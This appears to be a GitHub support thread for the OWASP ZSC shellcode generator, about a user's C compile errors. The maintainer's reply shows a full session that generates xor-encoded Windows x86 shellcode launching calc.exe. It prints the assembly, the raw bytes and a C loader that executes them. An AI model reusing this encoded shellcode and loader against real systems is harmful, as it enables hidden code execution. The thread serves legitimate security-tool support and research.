OWASP
compiling
i am trying to compile this to executable but getting errors below
||=== Build: Release in QA (compiler: GNU GCC Compiler) ===| C:~\Documents\QA\main.c|1|error: expected identifier or '(' before '=' token| c:\program files (x86)\codeblocks\mingw\include\stdio.h|191|error: unknown type name 'size_t'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|207|error: unknown type name 'size_t'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|211|error: unknown type name 'size_t'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|319|error: unknown type name 'size_t'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|320|error: unknown type name 'size_t'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|331|error: unknown type name 'size_t'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|332|error: unknown type name 'size_t'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|412|error: expected ',' or ';' before 'fread'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|413|error: expected ',' or ';' before 'fwrite'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|565|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|568|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|605|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|606|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|609|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|36|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|37|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|38|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|39|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|40|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|46|error: expected ',' or ';' before 'strcspn'| c:\program files (x86)\codeblocks\mingw\include\string.h|49|error: expected ',' or ';' before 'strlen'| c:\program files (x86)\codeblocks\mingw\include\string.h|50|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|51|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|52|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|55|error: expected ',' or ';' before 'strspn'| c:\program files (x86)\codeblocks\mingw\include\string.h|58|error: expected ',' or ';' before 'strxfrm'| c:\program files (x86)\codeblocks\mingw\include\string.h|65|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|66|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|72|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|73|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|77|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|80|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|81|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|90|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|91|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|103|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|104|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|107|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|110|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|115|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|131|error: expected ',' or ';' before 'wcscspn'| c:\program files (x86)\codeblocks\mingw\include\string.h|133|error: expected ',' or ';' before 'wcslen'| c:\program files (x86)\codeblocks\mingw\include\string.h|134|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|135|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|136|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|139|error: expected ',' or ';' before 'wcsspn'| c:\program files (x86)\codeblocks\mingw\include\string.h|142|error: expected ',' or ';' before 'wcsxfrm'| c:\program files (x86)\codeblocks\mingw\include\string.h|156|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|157|error: expected declaration specifiers or '...' before 'size_t'| ||More errors follow but not being shown.| ||Edit the max errors limit in compiler options...| ||=== Build failed: 50 error(s), 0 warning(s) (0 minute(s), 0 second(s)) ===|
Hi,
can you please share the file or the command you used for generating the shellcode?
Regards.
Hi, sorry for my late answer, you encoded the file wrong! it has eval(some value) at the end which is not related to .c file or shellcodes.
- here is a sample command
______ __ _____ _____ ______ _____ _____
/ __ \ \ / /\ / ____| __ \ |___ // ____|/ ____|
| | | \ \ /\ / / \ | (___ | |__) | / /| (___ | |
| | | |\ \/ \/ / /\ \ \___ \| ___/ / / \___ \| |
| |__| | \ /\ / ____ \ ____) | | / /__ ____) | |____
\____/ \/ \/_/ \_\_____/|_| /_____|_____/ \_____|
OWASP ZeroDay Cyber Research Shellcoder
zsc> shellcode
zsc/shellcode> generate
zsc/shellcode/generate>
linux_x86 osx_x86 windows_x86 windows_x86_64
zsc/shellcode/generate> w
windows_x86 windows_x86_64
zsc/shellcode/generate> windows_x86
zsc/shellcode/generate/windows_x86> exec
zsc/shellcode/generate/windows_x86/exec> file_to_execute
file_to_execute> test/calc.exe
[+] file_to_execute set to "test/calc.exe"
[+] none
[+] xor_random
[+] add_random
[+] sub_random
[+] xor_yourvalue
[+] inc
[+] dec
[+] inc_timesyouwant
[+] dec_timesyouwant
[+] add_yourvalue
[+] sub_yourvalue
[+] enter encode type
zsc/shellcode/generate/windows_x86/exec/encode_type> xo
xor_random xor_yourvalue
zsc/shellcode/generate/windows_x86/exec/encode_type> xor_random
Output assembly code?(y or n)> y
xor %ecx,%ecx
mov %fs:0x30(%ecx),%eax
mov 0xc(%eax),%eax
mov 0x14(%eax),%esi
lods %ds:(%esi),%eax
xchg %eax,%esi
lods %ds:(%esi),%eax
mov 0x10(%eax),%ebx
mov 0x3c(%ebx),%edx
add %ebx,%edx
mov 0x78(%edx),%edx
add %ebx,%edx
mov 0x20(%edx),%esi
add %ebx,%esi
xor %ecx,%ecx
inc %ecx
lods %ds:(%esi),%eax
add %ebx,%eax
cmpl $0x50746547,(%eax)
jne 23 <.text+0x23>
cmpl $0x41636f72,0x4(%eax)
jne 23 <.text+0x23>
cmpl $0x65726464,0x8(%eax)
jne 23 <.text+0x23>
mov 0x24(%edx),%esi
add %ebx,%esi
mov (%esi,%ecx,2),%cx
dec %ecx
mov 0x1c(%edx),%esi
add %ebx,%esi
mov (%esi,%ecx,4),%edx
add %ebx,%edx
push %ebx
push %edx
xor %ecx,%ecx
push %ecx
mov $0x61636578,%ecx
push %ecx
subl $0x61,0x3(%esp)
push %ebx
push $0x684b6641
pop %ebx
push $0x2d250f16
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx
push %esp
push %ebx
call *%edx
add $0x8,%esp
pop %ecx
push %eax
xor %ecx,%ecx
push %ecx
push %ebx
push $0x346c7a53
pop %ebx
push $0x51fceac3
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx
pop %ecx
shr $0x10,%ecx
shr $0x8,%ecx
push %ecx
push %ebx
push $0x64454f35
pop %ebx
push $0x1c206156
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx
push %ebx
push $0x71366243
pop %ebx
push $0x1d57016c
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx
push %ebx
push $0x634c6159
pop %ebx
push $0x173f042d
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx
xor %ebx,%ebx
mov %esp,%ebx
xor %ecx,%ecx
inc %ecx
push %ecx
push %ebx
call *%eax
add $0x18,%esp
pop %edx
pop %ebx
xor %ecx,%ecx
mov $0x61737365,%ecx
push %ecx
subl $0x61,0x3(%esp)
push %ebx
push $0x4e525274
pop %ebx
push $0x2d3d2024
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx
push %ebx
push $0x42687743
pop %ebx
push $0x36010f06
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx
push %esp
push %ebx
call *%edx
xor %ecx,%ecx
push %ecx
call *%eax
Output shellcode to screen?(y or n)> y
[+] Generated shellcode is:
\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x53\x52\x31\xc9\x51\xb9\x78\x65\x63\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x49\x31\x7a\x57\x5b\x68\x1e\x58\x14\x12\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x83\xc4\x08\x59\x50\x31\xc9\x51\x53\x68\x46\x49\x77\x49\x5b\x68\xd6\xd9\xe7\x2c\x59\x31\xd9\x5b\x51\x59\xc1\xe9\x10\xc1\xe9\x08\x51\x53\x68\x57\x6b\x43\x6f\x5b\x68\x34\x45\x26\x17\x59\x31\xd9\x5b\x51\x53\x68\x35\x6c\x37\x51\x5b\x68\x1a\x0f\x56\x3d\x59\x31\xd9\x5b\x51\x53\x68\x79\x4c\x6b\x53\x5b\x68\x0d\x29\x18\x27\x59\x31\xd9\x5b\x51\x31\xdb\x89\xe3\x31\xc9\x41\x51\x53\xff\xd0\x83\xc4\x18\x5a\x5b\x31\xc9\xb9\x65\x73\x73\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x76\x73\x56\x43\x5b\x68\x26\x01\x39\x20\x59\x31\xd9\x5b\x51\x53\x68\x48\x41\x37\x50\x5b\x68\x0d\x39\x5e\x24\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x31\xc9\x51\xff\xd0
Shellcode output to a .c file?(y or n)> y
Target .c file?> shellcode.c
[+] File saved as shellcode.c .
zsc> wrong input!
[!] interrupted by user!
Exit
C:\Users\Zombie\Documents\GitHub\OWASP-ZSC>type shellcode.c
#include <stdio.h>
#include <string.h>
/*
This shellcode generated by OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
http://zsc.z3r0d4y.com/
owasp-zsc[at]googlegroups[dot]com
Title: exec('test/calc.exe')
OS: windows_x86
Encode: xor_random
Length: 278
Assembly code:
xor %ecx,%ecx
mov %fs:0x30(%ecx),%eax
mov 0xc(%eax),%eax
mov 0x14(%eax),%esi
lods %ds:(%esi),%eax
xchg %eax,%esi
lods %ds:(%esi),%eax
mov 0x10(%eax),%ebx
mov 0x3c(%ebx),%edx
add %ebx,%edx
mov 0x78(%edx),%edx
add %ebx,%edx
mov 0x20(%edx),%esi
add %ebx,%esi
xor %ecx,%ecx
inc %ecx
lods %ds:(%esi),%eax
add %ebx,%eax
cmpl $0x50746547,(%eax)
jne 23 <.text+0x23>
cmpl $0x41636f72,0x4(%eax)
jne 23 <.text+0x23>
cmpl $0x65726464,0x8(%eax)
jne 23 <.text+0x23>
mov 0x24(%edx),%esi
add %ebx,%esi
mov (%esi,%ecx,2),%cx
dec %ecx
mov 0x1c(%edx),%esi
add %ebx,%esi
mov (%esi,%ecx,4),%edx
add %ebx,%edx
push %ebx
push %edx
xor %ecx,%ecx
push %ecx
mov $0x61636578,%ecx
push %ecx
subl $0x61,0x3(%esp)
push $0x456e6957
push %esp
push %ebx
call *%edx
add $0x8,%esp
pop %ecx
push %eax
xor %ecx,%ecx
push %ecx
push $0x65909090
pop %ecx
shr $0x10,%ecx
shr $0x8,%ecx
push %ecx
push $0x78652e63
push $0x6c61632f
push $0x74736574
xor %ebx,%ebx
mov %esp,%ebx
xor %ecx,%ecx
inc %ecx
push %ecx
push %ebx
call *%eax
add $0x18,%esp
pop %edx
pop %ebx
xor %ecx,%ecx
mov $0x61737365,%ecx
push %ecx
subl $0x61,0x3(%esp)
push $0x636f7250
push $0x74697845
push %esp
push %ebx
call *%edx
xor %ecx,%ecx
push %ecx
call *%eax
compile example(osx_x86): gcc -m32 -o shellcode_compiled shellcode.c
compile example(linux_x86): gcc -m32 -z execstack -o shellcode_compiled shellcode.c
compile example(windows_x86): gcc -o shellcode_compiled.exe shellcode.c
followed by(to run): ./shellcode_compiled or shellcode_compiled.exe
*/
char *shellcode = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x53\x52\x31\xc9\x51\xb9\x78\x65\x63\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x49\x31\x7a\x57\x5b\x68\x1e\x58\x14\x12\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x83\xc4\x08\x59\x50\x31\xc9\x51\x53\x68\x46\x49\x77\x49\x5b\x68\xd6\xd9\xe7\x2c\x59\x31\xd9\x5b\x51\x59\xc1\xe9\x10\xc1\xe9\x08\x51\x53\x68\x57\x6b\x43\x6f\x5b\x68\x34\x45\x26\x17\x59\x31\xd9\x5b\x51\x53\x68\x35\x6c\x37\x51\x5b\x68\x1a\x0f\x56\x3d\x59\x31\xd9\x5b\x51\x53\x68\x79\x4c\x6b\x53\x5b\x68\x0d\x29\x18\x27\x59\x31\xd9\x5b\x51\x31\xdb\x89\xe3\x31\xc9\x41\x51\x53\xff\xd0\x83\xc4\x18\x5a\x5b\x31\xc9\xb9\x65\x73\x73\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x76\x73\x56\x43\x5b\x68\x26\x01\x39\x20\x59\x31\xd9\x5b\x51\x53\x68\x48\x41\x37\x50\x5b\x68\x0d\x39\x5e\x24\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x31\xc9\x51\xff\xd0";
int main(void)
{
(*(void(*)()) shellcode)();
return 0;
}
C:\Users\Zombie\Documents\GitHub\OWASP-ZSC>
did you use jsfuck encoding or something by accident? it's not gonna work for "c" language. (check the file you attached at line 113)